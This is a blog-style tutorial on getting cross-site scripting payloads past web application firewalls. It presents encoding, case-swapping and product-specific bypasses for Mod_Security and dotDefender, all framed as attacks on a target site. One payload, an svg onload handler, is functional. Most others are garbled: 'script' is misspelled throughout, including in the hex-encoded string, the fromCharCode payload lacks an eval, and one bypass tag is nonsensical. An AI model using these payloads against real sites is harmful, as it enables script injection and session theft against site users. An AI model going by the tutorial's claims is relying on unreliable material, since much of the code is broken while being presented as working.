Bypassing Modern XSS WAF Filters

XSS (Cross-site Scripting) Attack is a Vulnerability that is occurs due to Failure of Input Parameters of the user and as well as the Server response of the Web Application.XSS Attack allows a attacker to insert his Malicious HTML code in the Target Website.
In the Previous Tutorials on XSS we have Learn Some Basics of XSS Attack and the usage of XSS With SQL injection.



Now let's Come to the next part of Bypassing the XSS WAF Filters by using Different Techniques.
In normal cases While we are trying to exploiting XSS Vulnerability we can easily break into the Security Because of Zero Web Application Firewall Protection on the Target site.
But in Strong WAF's it is very Difficult To bypass the security and then attacker came to the Conclusion to Bypass the XSS WAF Filters.

Bypassing Modern XSS WAF Filters:
Let's Start from the Bypassing basic XSS PAYLOAD that we mostly used on daily routine.
Here is the XSS Payload:

<scirpt>alert("XSS")</script>

When we execute this Payload  ,if there is Normal WAF on the Target site then we will be easily able to Exploit the XSS ATTACK but if there are some Modern WAF Filters then we have to Bypass that WAF Filters.Some WAF Filters automatically escapes some Characters from our XSS Payload like " ' "(Single Quote) ," " " (Double Qoute) or " / " (back-Slashes) .Here are some Methods for Bypassing these XSS Characters .

Bypassing XSS WAF by using ASCII Value:
In this Method we will bypass the XSS WAF by using ASCII Characters in our Target site .
Let's Say this is our XSS Payload .

<scirpt>alert("XSS")</script>

When we execute this Payload the XSS WAF Filters will Escaped some of our Characters like Single or Double Magic Quotes and our Payload doesn't work anymore.To bypass the Magic Quotes we will convert our Payload into ASCII Characters and then execute it.We can use Hackbar for Converting our XSS Payloads into ASCII Characters.Our ASCII Converted Value is work with in Javascript Funtion,when we will execute our ASCII Value The Javascript will Convert it into that Characters that we have encoded.

For Example:
XSS Payload:alert("XSS")

ASCII Converted Value:
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)

Now we will add this Converted String into our XSS Payload:
<scirpt>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</script>

This will Bypass Characters of our String which were blocked by the WAF Filters and our Script will bypassed successfully in the Target Site.

Bypassing XSS WAF by using Hex Encoding:
In this Method we will convert our whole XSS Payload into Hex Value and then run it in the Target Site.This will execute our XSS Payload without getting it Blocked by the WAF.

Here is our XSS Payload:

<scirpt>alert("XSS")</script>

Encoded Value:%3c%73%63%69%72%70%74%3e%61%6c%65%72%74%28%22%58%53%53%22%29%3c%2f%73%63%72%69%70%74%3e

So we will use this Encoded Value in the Target site .

Bypassing XSS WAF by OBFUSCATING:
In this method we are going to use Upper case and lower Case Keywords in our XSS Payload for Bypassing the XSS WAF Filters.In some Cases the admin have Blocked some Plane words like Alert or Script And when we will Execute our XSS Payload the WAF Filters will automatically Escaped them and our Payload Doesn't Work.
So in that case we have to Use Upper and Lower Case Letters instead of Plane Letters for Bypassing the XSS WAF Filters.

Here is Our XSS Payload:<scirpt>alert("XSS")</script>

Bypassed XSS Payload:<sCiRPt>aLeRT("XSS")</sCriPT>

This XSS Payload will Bypass the XSS WAF Filter and we can easily able to run our Script.
These are some Basic XSS WAF Bypassing Techniques That will help in XSS Attack.

Bypassing XSS WAF Mod_Security:
Some times when we execute our XSS Payload but there we Got a Error like.
"Not Acceptable! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security"

So we have to Bypass the Mod_Security WAF on the Target Site.

Our XSS Payload:
<scirpt>alert("XSS")</script>

Here is the Bypass of our XSS PAYLOAD:
<scirpt>alert("XSS")</scri0pt>

Bypassing XSS WAF Dot Defender: 
Dot Defender is another Web Application Firewall (WAF) which restricted our Malicious Codes from reaching to the Target Sites.When we try to run our XSS query in the Dot Defender WAF Protected website it gives a Error .

"dotDefender Blocked Your Request"

So in that case our Script Wont work there .We Need to bypass the Dot Defender WAF for making our malicious Scripts run in the web application.So here is the Bypassed XSS Payload for Dot Defender WAF.

Dot Defender WAF Bypassed XSS Payload: <svg/onload=prompt(1);> 
 
AUTHOR:Rai Muzammal Hussain